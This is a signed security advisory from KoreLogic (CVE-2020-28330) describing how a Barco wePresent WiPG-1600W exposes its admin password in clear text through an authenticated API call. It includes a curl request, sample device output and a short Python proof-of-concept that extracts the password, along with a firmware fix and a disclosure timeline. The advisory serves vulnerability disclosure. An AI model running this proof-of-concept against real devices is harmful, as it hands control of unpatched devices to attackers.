-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

KL-001-2020-005 : Barco wePresent Admin Credentials Exposed In Plain-text

Title: Barco wePresent Admin Credentials Exposed In Plain-text
Advisory ID: KL-001-2020-005
Publication Date: 2020.11.20
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2020-005.txt


1. Vulnerability Details

     Affected Vendor: Barco
     Affected Product: wePresent WiPG-1600W
     Affected Version: 2.5.1.8
     Platform: Embedded Linux
     CWE Classification: CWE-523: Unprotected Transport of Credentials
     CVE ID: CVE-2020-28330


2. Vulnerability Description

     An attacker armed with hardcoded API credentials from
     KL-001-2020-004 (CVE-2020-28329) can issue an authenticated
     query to display the admin password for the main web user
     interface listening on port 443/tcp.


3. Technical Description

     An authenticated request using the hardcoded credentials in
     KL-001-2020-004 (CVE-2020-28329) to https://<IP>:4001/w1.0
     will display the current admin password in clear text. An
     attacker will now have the admin password on the device, and
     can use the web interface to make any configuration changes
     to the device using the web UI.

     $ curl -k -u 'admin:[REDACTED]'
     https://192.168.2.200:4001/w1.0 { "status": 200, "message":
     "Get successful", "data": { "key": "/w1.0", "value": {
                 "ClientAccess":{
                     "EnableAirplay": true
                 }, "Configuration":{
                     "RestartSystem": false, "ShutdownSystem": false,
                     "SetAction": "NoAction", "SetActionUrl": ""
                 }, "DeviceInfo":{
		     "ArticleNumber": "Barco_Number",
		     "CurrentUptime": 58524, "InUse": false,
		     "ModelName": "WiPG-1600", "Sharing": false,
		     "Status": 0, "StatusMessage": "", "TotalUptime":
		     473871262, "TotalUsers": 0, "LoginCodeOption":
		     "Random", "LoginCode": "3746", "SystemPassword":
		     "W3Pr3s3nt",	      <- Admin password
     ...  ...


4. Mitigation and Remediation Recommendation

     The vendor has released an updated firmware (2.5.3.12) which
     remediates the described vulnerability. Firmware and release
     notes are available at:

     https://www.barco.com/en/support/software/R33050104


5. Credit

     This vulnerability was discovered by Jim Becher (@jimbecher) of
     KoreLogic, Inc.


6. Disclosure Timeline

     2020.08.24 - KoreLogic submits vulnerability details to
                  Barco.
     2020.08.25 - Barco acknowledges receipt and the intention
                  to investigate.
     2020.09.21 - Barco notifies KoreLogic that this issue, 
                  along with several others reported by KoreLogic,
                  will require more than the standard 45 business
                  day remediation timeline. Barco requests to delay 
                  coordinated disclosure until 2020.12.11.
     2020.09.23 - KoreLogic agrees to 2020.12.11 coordinated disclosure.
     2020.09.25 - Barco informs KoreLogic of their intent to acquire
                  CVE number for this vulnerability.
     2020.11.09 - Barco shares CVE number with KoreLogic and announces
                  their intention to release the updated firmware
                  ahead of schedule, on 2020.11.11. Request that KoreLogic
                  delay public disclosure until 2020.11.20.
     2020.11.11 - Barco firmware release.
     2020.11.20 - KoreLogic public disclosure.


7. Proof of Concept

     The following is a basic Python function to return the admin password:
     
     def get_admin_pw(host, port, adminpw):
         apiuser = "admin"
         apipw = "[REDACTED]"
         url = "https://" + host + ":" + port + "/w1.0"
         response = requests.get(url, auth=HTTPBasicAuth(apiuser, apipw), verify=False, timeout=3)
         dict = response.json()
         adminpw = dict['data']['value']['DeviceInfo']['SystemPassword']
         return adminpw


The contents of this advisory are copyright(c) 2020
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCAA4FiEETtzSIGy8wE6Vn0geUk0uR1lFz/MFAl+4JqoaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQUk0uR1lFz/MSgw/+IRlyn6uTOKl+yRh25SlY
JIaq7y2Zm5LcmmA9hzM0i6QB6NMubnqrXq5/rAay9RvL9kIwLgHrggkdI/fUZldI
kHkyN2bnjJF8/1rD8GjMXl3pT/sETJJs7JQ1JF+ulRTfX/L9qlYMYlzBXCtAgSge
bJsEkvt0KM4SHXxU+5LrGGVEySgLoZ3Md1TNR6goMb6C13Mqo9Tatw+WOn5uHRpA
176i2T/GXjABLkSveUuRs46atlRbePzwT1QH5wZtuC5l0ebOjT/oVBVbOMnvSpOn
zKdK64D29EaTsnRTAuVGGfCYhWdB4w3SL9mwnF5W+JzWKgnsQ//oUjj6k8LRz/IH
X+3XOA5lYk2lmIWBlmgaF3k76v8EKatIrRODaqKwdQML8er1wtSjFj6RrZAYqiH+
HO05IWkiPk+ir9I6Q9URfs+/pUdMKmnqpReAogCOrRSpfXOndOSXnfpWeCCzqtwV
bNeW2ua+AwxFpFGhn5MQ0XyGUmxYO3QpBmsVQ4zY00bmTQBHVxZLghSQY9rZzKMg
YXoIh3w5bxIqnvO2v0KrQXE3gRmfNLLF5QuO/CnQfaKWoObMztEAIWlKXbdzNnm4
sT00e9SDYTd9VKvkY7l06HIel+jWNCSIJ5uTqWdryRGcA8vbbtCGJdxjxiJ7eCE7
EcluGCSQHPWVnOJyKJYKBgA=
=sq3k
-----END PGP SIGNATURE-----